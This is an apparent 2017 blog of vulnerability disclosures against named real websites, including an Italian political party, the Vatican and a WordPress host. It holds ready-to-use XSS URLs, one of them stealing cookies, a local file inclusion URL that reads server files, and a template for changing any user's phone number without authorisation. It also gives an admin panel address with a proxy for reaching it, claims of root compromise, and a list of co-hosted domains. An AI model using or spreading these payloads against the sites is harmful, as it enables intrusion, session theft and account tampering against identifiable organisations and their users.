Tuesday, 3 October 2017

http://www.carminevalentino.it/ | xss

 http://www.carminevalentino.it/

Path can be seen in the 404 error pages
D:\inetpub\webs\carminevalentinoit\


XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1


and we can place any video in the content

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1


shortened url: https://goo.gl/sWhg1P
archived url: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech is usually sending spam emails.

There's a fake unsubscribe script that reports the removal of anything, even if you add a simple xss.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com

____

The mail server can be exploited with an old remote exploit for postfix on debian linux. (shellshock)

Monday, 2 October 2017

www.qumran2.net | XSS




simple xss
http://www.qumran2.net/indice.php?parole=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&p=barra_ric

Saturday, 30 September 2017

hacksannio.it (... other websites) | path disclosure, system compromise




by simply using the theme url
http://www.hacksannio.it/wp-content/themes/betheme/

we can raise an error

Fatal error: Uncaught Error: Call to undefined function get_header() in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php:10 Stack trace: #0 {main} thrown in /web/htdocs/www.hacksannio.it/home/wp-content/themes/betheme/index.php on line 10




_______________
Update:
after getting the possibility to execute code it's possible to locally escalate root privileges (expl. openrestinpeace) and local DoS.

There are several other websites on the server:


9plus.it
abgdhs.com
academyhoreca.it
acquagia.com
agropolibooking.it
albertogalantini.com
alcacomunicazione.it
alexandramatveeva.com
alkemicaproject.it
allianceagainstcancer.org
anelli.info
angolodeidesideri.it
antonelladambrosio.com
apicolturavallicupe.com
appcreative.it
arredostil.it
aspveneto.org
avvocatovitali.com
bbqcombi.com
belsiana7central.com
beneventocalcio.it
bestravelsintheworld.com
bevolution-torino.com
bng-69.com
brunellivini.com
buonanotteitalia.it
caffeedintornimanfredonia.it
caffetteriadonnafugata.com
campaniabynight.it
casadinosaurobaratti.com
cbdoilitalia.com
cbdoilitalia.it
centro-assistenza-riscaldamento-caldaia.it
centroippicolacastellana.com
cercarime.it
cerimoniacivile.it
championspost.com
cogg.it
colorificiobergamogmr.com
colosseoguesthouse.com
comitesecuador.com
consiliumhaus.com
consorzionauticoeurope.eu
cremonesigsc.it
crispi10.com
cruise-ship-padding-protections.com
dabetlemmeagerusalemme.it
damaadv.it
damascenafilm.com
dapperholdings.net
diegoromano.com
doodleit.info
ducciobarbieri.it
ecotecnoitalia.com
elabora.com
elisagiordano.it
esabase.it
escursioniambientali.it
ethicintent.com
farmastorecelano.com
fasac.net
fatticonilcuore.it
feelsassello.it
fieraesteticabfs.com
fikatelo.com
firebarcable.it
fitbyalena.com
formazioneinviaggio.com
fundaciontopuc.com
gabrieleciolino.com
galileisrl.it
gamper.info
gbracademy.it
glassjourney.eu
good-byte.it
gretatulipani.com
growupgroup.com
gruppocinquesrl.com
happyvegan.it
idraulico-dettofatto.com
ilcicloturista.com
ilgrifo.org
ilmionutrizionista.eu
immobilmedia.com
impresalcentro.it
incofar-sanitario.it
infissitech.it
infive2001.com
infovax.it
inmyfantasiart.com
irillipostermurali.com
italiadidattica.it
ixchel.it
just-fab.org
keybeach.it
kingliontoursandsafaris.com
laboutiquedelcaffe.eu
lacasadelcellulare.it
lasergild.org
laterrazzapalace.com
latteriapievevergonte.it
lazzerinispa.com
lignohouse.com
logiform.org
lorenzoceci.com
luggagestorageflorence.com
luisrecensione.com
luomoedizioni.com
luxuryrelaisgroup.com
mabelleroma.it
maffiolettiserramenti.com
maglificiocanto.it
marisacalisti.it
minoxdyeing.it
mit-industries.biz
mommorecords.com
mondello.it
mostrobirraio.it
mst-tutorial.it
museostoricopompieri.it
mutapietra.it
newparagraphsrl.it
nonprofitcoaching.it
nordictrailitalia.it
npsolution.eu
npsolution.it
nutrirsi.eu
officineferretti.it
officinezuccherine.it
osinformatica.it
ottoselezioni.com
owhub.com
p2psrl.com
paisart.com
palazzonaclerio.com
palermoairportbus.com
palermoculture.net
palermotrapaniairportbus.com
panciadartista.com
papeleriasierranorte.com
parchipertutti.com
pastaedolci.com
personalityontwitter.com
personalityontwitter.it
pierogalloproject.com
pjpen.it
podavinicarni.com
poggioallefonti.com
pontevetero.com
ppmitaly.com
priscagoldoni.com
radio105stereo.it
radthedealer.com
rcimpiantinstallazionievendite.com
reaelettrica.com
realfoodbuyers.com
recuperolegale.it
reflexonekft.com
relaispiazzavittoria.com
rialzatimolise.com
riccardopirani.com
rich24.it
riparticonnoi.it
romashop24.it
romasportexperience.com
romecabtransfer.com
runzonesport.com
safety-padding-protections.com
sanluvicorporation.com
sardegnarobotica.eu
scuolaarcobalenofaenza.com
seabrothers.eu
sereninvest.com
serietvmagazine.it
sfrishy.com
sitoprova.info
sl-engineering.net
smed3.com
sofistikada.com
sosrazzismo.com
sovieroenergia.com
stefanogiommini.com
storieincorso.com
studiodentisticotrebbi.it
studioderoia.com
studiofenicchiaodontoiatria.it
studiolegalecartelli.com
studiostanza.it
supersneakershop.com
teambuilding-evolution.it
teambuildingevolution.it
tecnologienews.com
tizianoguerra.com
tonydee.it
tradinglabcapital.com
tuckershoes.com
tueiltuopatrimonio.it
unamammaperguida.com
ungran-casino.it
vandog.it
vast-east.com
venetacucinepalermo.it
veneto-piu.com
visalusitaly.com
visalusitaly.it
volucello.it
webdesignervarese.it
weddingintuscany.net
zegalianews.it
zerogravityferrara.it

Sunday, 24 September 2017

w2.vatican.va photovat.com | XSS, path disclosure


Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________
Adobe experience manager CMS
A proxy is needed to connect since probably they limited the access from a range of IPs
-> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin

SSL verification must be disabled (OCSP on firefox).

Update: it's possible to access
_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________
 http://www.photovat.com
IIS server
D:\inetpub\webs\photovatcom

https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise


https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn

archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

the script can be triggered to show errors and the path
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58    


XSS
There are various xss and stored xss in the profile area.

It's possible to change the phone number even if they tried to hide it by setting the <input> as hidden (sigh).






When the xss are used there's an error, probably related to the movable type cgi.
"Can't call method &amp;quot;id&amp;quot; on an undefined value"


The phone number can be changed for any registered user without permissions.
https://www.movimento5stelle.it/php/load_cid.php?userID=[progressiveinteger related to the user]&m=[email]&key=[fakekey]&sms_key=[fakekey.dot.fakekey]&verify=1&telefono=[telephone with international prefix]

the fake key can be generated by using the keys genereted from a dummy/fake/working account.


____________________________________



Monday, 4 September 2017

https://iscriviti.radicali.it | errors, path disclosure, system compromise



https://iscriviti.radicali.it

directly accessing this url we get an error with the paths
https://iscriviti.radicali.it/Landing/RegistraDati

D:\xampp\htdocs\radicali\landing_iscrizione\index.php

They are using windows and xampp that are not the best solution for a production server that should store sensitive data.

The php scripts are using the codeigniter framework.

The archived error page:
http://archive.is/PFw55